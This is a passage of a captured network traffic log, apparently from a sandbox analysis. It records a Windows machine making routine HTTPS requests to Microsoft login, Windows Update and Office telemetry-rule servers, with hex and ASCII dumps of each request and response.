N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49760	40.126.31.69	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 09:33:21 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 09:33:21 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 09:32:21 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_SN1 x-ms-request-id: 6e710c9c-cd68-45c3-be8f-163278ef175c PPServer: PPV: 30 H: SN1PEPF0002F11C V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 09:33:21 GMT Connection: close Content-Length: 1276
2024-11-11 09:33:21 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49761	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xM6bluABF+SGvfF&MD=9wAFnYdP HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-11 09:33:21 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 9a0c2927-2626-44d8-9edc-b7e548074db0 MS-RequestId: dbd17145-7ee3-40cc-bc2c-cdc2a9bdb23c MS-CV: oyMKs3BVfEaclfNq.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 11 Nov 2024 09:33:21 GMT Connection: close Content-Length: 24490
2024-11-11 09:33:21 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-11 09:33:21 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:21 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 8317a370-b01e-0001-33d5-3346e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093321Z-174f7845968c2t8dhC1EWR8s2000000004fg000000004r98 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:21 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:21 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 33d009d3-501e-007b-36d5-335ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093321Z-174f7845968j9dchhC1EWRfe7400000004m0000000004zmn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:21 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:21 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 0eb2a1cd-301e-0020-44d5-336299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093321Z-174f7845968cdxdrhC1EWRg0en00000004p0000000006s9f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:21 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:21 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:21 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 45cb36d2-601e-0070-3cd5-33a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093321Z-174f7845968jrjrxhC1EWRmmrs00000004v00000000065sb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:21 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:21 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:21 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c8cfd17a-b01e-0053-1cd5-33cdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093321Z-174f7845968vqt9xhC1EWRgten00000004pg00000000a813 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:21 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 1973b281-501e-0047-7bd5-33ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093322Z-174f7845968swgbqhC1EWRmnb400000004y0000000003565 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:22 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:22 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 9a2bdabf-a01e-0053-27d5-338603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093322Z-174f7845968qj8jrhC1EWRh41s00000004qg000000003t1e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:22 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:22 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
